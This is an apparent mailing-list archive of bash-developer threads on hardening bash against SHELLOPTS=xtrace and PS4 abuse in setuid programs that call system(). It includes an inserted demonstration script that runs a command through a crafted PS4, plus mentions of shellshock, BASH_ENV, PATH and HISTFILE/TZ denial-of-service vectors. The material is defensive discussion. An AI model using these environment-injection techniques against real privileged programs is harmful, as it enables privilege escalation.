On 12/15/15 12:04 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> $ bash --version
> GNU bash, version 4.2.53(1)-release (x86_64-redhat-linux-gnu)
>
> Or did you just patch it, since you used "../bash-4.3-patched/bash ./x19" ?
No. bash-4.3-patched/bash is bash-4.3.42 (to distinguish it from bash-4
Quoting "Chet Ramey" :
Which should not be affected by what we're talking about, which is not
importing PS4 from the environment when uid == 0.
He later said "(Blocking PS4 and not SHELLOPTS=xtrace would work for me in that regard)".
Still shows how useful xtrace is and how it is necessa
On 12/15/15 10:40 AM, Stephane Chazelas wrote:
> 2015-12-15 09:01:05 -0500, Chet Ramey:
> [...]
>>> Mind explaining this one?
>>> I can't seem to write to HISTFILE in a non-interactive shell, or am I
>>> missing something?
>>
>> You just need to enable history (set -o history). History is independ
2015-12-15 09:01:05 -0500, Chet Ramey:
> On 12/14/15 6:30 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> > Quoting "Stephane Chazelas" :
> >
> > I understand what you're saying.
> > As much as we would like, there's no way of stopping all attack vectors by
> > only hardening bash, not only that, but
Quoting "Stephane Chazelas" :
I don't know if you can make a non-interactive bash write to the
$HISTFILE, but bash, even when non-interactive, even when called
as sh, with SHELLOPTS=history will *read* the HISTFILE.
Thanks for clearing that up for me. Makes sense.
Quoting "Chet Ramey" :
I
On 12/15/15 11:37 AM, up201407...@alunos.dcc.fc.up.pt wrote:
>> You just need to enable history (set -o history). History is independent
>> of whether or not the shell is interactive; it's just enabled by default
>> in interactive shells.
>
> doing a "set -o history" didn't work for me, only whe
Quoting "Chet Ramey" :
On 12/15/15 11:37 AM, up201407...@alunos.dcc.fc.up.pt wrote:
You just need to enable history (set -o history). History is independent
of whether or not the shell is interactive; it's just enabled by default
in interactive shells.
doing a "set -o history" didn't work f
On 12/15/15 12:33 PM, Stephane Chazelas wrote:
> 2015-12-15 09:01:05 -0500, Chet Ramey:
>> On 12/14/15 6:30 PM, up201407...@alunos.dcc.fc.up.pt wrote:
>>> Quoting "Stephane Chazelas" :
>>>
>>> I understand what you're saying.
>>> As much as we would like, there's no way of stopping all attack vecto
2015-12-15 09:01:05 -0500, Chet Ramey:
[...]
> > Mind explaining this one?
> > I can't seem to write to HISTFILE in a non-interactive shell, or am I
> > missing something?
>
> You just need to enable history (set -o history). History is independent
> of whether or not the shell is interactive; it
On 12/14/15 6:30 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> Quoting "Stephane Chazelas" :
>
> I understand what you're saying.
> As much as we would like, there's no way of stopping all attack vectors by
> only hardening bash, not only that, but also taking away its useful features.
> Though I s
2015-12-15 00:30:16 +0100, up201407...@alunos.dcc.fc.up.pt:
[...]
> >Should we also block SHELLOPTS=history
> >HISTFILE=/some/file like /proc/$pid/fd/$fd and
> >TZ=/proc/$pid/fd/$fd (like for your /bin/date command) as that
> >allows DoS on other processes (like where those fds are for
> >pipes).
>
Quoting "Stephane Chazelas" :
I understand what you're saying.
As much as we would like, there's no way of stopping all attack
vectors by only hardening bash, not only that, but also taking away
its useful features.
Though I still believe PS4 shouldn't be imported from the environment.
Sho
2015-12-14 18:01:13 +0100, up201407...@alunos.dcc.fc.up.pt:
[...]
> Obviously it's always the applications fault.
> The thing is that a simple patch in bash can stop most of these
> applications from getting exploited.
[...]
Should we also stop importing BASH_ENV in case some suid
application execu
Quoting "Stephane Chazelas" :
SHELLOPTS+PS4 is a known way to have the shell run arbitrary
commands. Before shellshock, env /bin/date='() { cmd; }' was
another one. The fix for shellshock closed that one.
Yes, exporting a function was a better known attack against this.
I can see why one mi
2015-12-13 12:49:58 -0500, Chet Ramey:
[...]
> I have to tell you, if I wanted to exploit a program written this poorly,
> I wouldn't mess around with SHELLOPTS. I'd go straight to PATH.
[...]
In the (very specific) OP's test case, he had
system("/bin/date"). Since /bin/date doesn't usually execu
Quoting "Chet Ramey" :
On 12/10/15 2:16 PM, up201407...@alunos.dcc.fc.up.pt wrote:
Hello,
This is a suggestion for a bash security hardening patch which prevents
xtrace from being initialized to the SHELLOPTS environment variable when a
new shell starts.
This is far too drastic a solution to
On 12/10/15 2:16 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> Hello,
>
> This is a suggestion for a bash security hardening patch which prevents
> xtrace from being initialized to the SHELLOPTS environment variable when a
> new shell starts.
This is far too drastic a solution to the problem you h
Quoting Stephane Chazelas:
setuid bash will ignore SHELLOPTS (and drop privileges except
for the patched Debian version). In your case, since you're
doing a setuid(0), bash is no longer called as setuid, so can't
detect it.
Correct.
So you've got a shell started as root with the environment
Regarding my last email, instead of a "break;" it should be a "continue;".
Just realized that xtrace might not always be last in $SHELLOPTS, so
it would break out of the while loop and stop the parsing of the rest
of the options.
$ cat file.c
#include <stdlib.h>   /* system() */
int main()
{
system("env");
}
$ gcc file.
2015-12-10 20:16:49 +0100, up201407...@alunos.dcc.fc.up.pt:
> Hello,
>
> This is a suggestion for a bash security hardening patch which
> prevents xtrace from being initialized to the SHELLOPTS environment
> variable when a new shell starts.
>
> xtrace can be used to exploit bogus system()/popen(
Hello,
This is a suggestion for a bash security hardening patch which
prevents xtrace from being initialized to the SHELLOPTS environment
variable when a new shell starts.
xtrace can be used to exploit bogus system()/popen() calls on setuid
binaries via a specially crafted PS4 environment
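As an added example that is not part of the thread (none of the participants posted this code), the script below reproduces the mechanism the original post and the later `system("env")` test program are about: SHELLOPTS=xtrace in the environment switches tracing on in a child bash, and because PS4 is expanded before every traced command, a command substitution placed in PS4 runs inside that child. It runs against an ordinary non-setuid bash and changes no uid, so the setuid(0)-then-system() step of the poster's test is not reproduced; bash is invoked by name because /bin/sh may be dash, and the marker path obtained from mktemp is an assumption of the example. Next to the attack it shows the application-side remedy the thread keeps coming back to: the privileged program, not the shell, must scrub its environment before calling a shell.

```shell
#!/bin/sh
# Added example, not code from the thread. Shows (1) SHELLOPTS=xtrace in the
# environment enabling tracing in a child bash, (2) a command substitution in
# PS4 executing when that child traces its first command, and (3) the
# application-side fix: start the shell with an allowlisted environment.
# Runs against a plain, non-setuid bash; nothing here changes uid.

# Start bash the way a naive system()/popen() caller does: the child inherits
# whatever SHELLOPTS and PS4 the caller's environment carries. bash is named
# explicitly because /bin/sh may be dash, which ignores SHELLOPTS.
#   $1 = SHELLOPTS value, $2 = PS4 value, $3 = command string for bash -c
spawn_inheriting_env() {
    env SHELLOPTS="$1" PS4="$2" bash -c "$3" 2>/dev/null
}

# Hardened variant. The outer env models the hostile caller environment; the
# inner "env -i" is what a privileged program should do before spawning a
# shell: drop everything and pass only an allowlist (here just PATH).
spawn_with_clean_env() {
    env SHELLOPTS="$1" PS4="$2" env -i PATH="$PATH" bash -c "$3" 2>/dev/null
}

# Prints "on" if the child bash picked up xtrace from SHELLOPTS, else "off".
xtrace_inherited() {
    spawn_inheriting_env xtrace '+ ' \
        'case $SHELLOPTS in *xtrace*) echo on ;; *) echo off ;; esac'
}

# Builds a PS4 whose expansion creates the file named in $1. PS4 undergoes
# parameter, command and arithmetic expansion before each traced command, so
# the $(...) runs inside the child with the child's privileges.
payload_ps4() {
    printf '$(touch %s) ' "$1"
}

# Returns 0 if the PS4 payload executed in the child, 1 if it did not.
# The marker file path from mktemp is an assumption of this example.
ps4_payload_fires() {
    marker=$(mktemp -u) || return 2
    spawn_inheriting_env xtrace "$(payload_ps4 "$marker")" ':'
    if [ -e "$marker" ]; then rm -f "$marker"; return 0; fi
    return 1
}

# Same payload through the hardened launcher: the child never sees SHELLOPTS
# or PS4, so xtrace stays off and the payload is never expanded.
ps4_payload_fires_clean() {
    marker=$(mktemp -u) || return 2
    spawn_with_clean_env xtrace "$(payload_ps4 "$marker")" ':'
    if [ -e "$marker" ]; then rm -f "$marker"; return 0; fi
    return 1
}

main() {
    printf 'xtrace inherited from SHELLOPTS: %s\n' "$(xtrace_inherited)"
    if ps4_payload_fires; then echo "PS4 payload ran (inherited env)"
    else echo "PS4 payload did not run (inherited env)"; fi
    if ps4_payload_fires_clean; then echo "PS4 payload ran (clean env)"
    else echo "PS4 payload did not run (clean env)"; fi
}

main "$@"
```

Two caveats when running it. Run as root against a bash that no longer imports PS4 from the environment when uid == 0 (the change referred to at the top of this listing), ps4_payload_fires returns 1 even with the inherited environment, while SHELLOPTS is still honoured and xtrace_inherited still prints on. And a genuinely setuid bash (euid != uid) starts in privileged mode, ignores SHELLOPTS and drops privileges, as noted further down; the program under discussion sidesteps that by calling setuid(0) first, which is why the fix belongs in the caller, as the hardened launcher shows.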
21 matches